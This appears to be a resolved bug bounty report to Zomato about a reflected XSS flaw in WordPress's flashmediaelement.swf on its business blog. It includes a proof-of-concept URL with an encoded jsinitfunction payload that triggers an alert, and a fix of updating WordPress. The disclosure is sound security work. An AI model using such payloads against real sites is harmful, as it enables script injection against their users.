XSS in flashmediaelement.swf (business-blog.zomato.com)
Medium
Z
Zomato
Submitted None
Actions:
Reported by
madrobot
Vulnerability Details
Technical details and impact analysis
Hello __Team__
__Description__:-
business-blog.zomato.com is vulnerable to reflected XSS that stems from an insecure URL sanitization process performed in the file flashmediaelement.swf
__POC__:-
https://business-blog.zomato.com/wp-includes/js/mediaelement/flashmediaelement.swf?%#jsinitfunctio%gn=alert%60xss by dem0n%60
{F154224}
__Fix__:-
Update to WordPress to latest
__Regards__:-
Santhosh
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Generic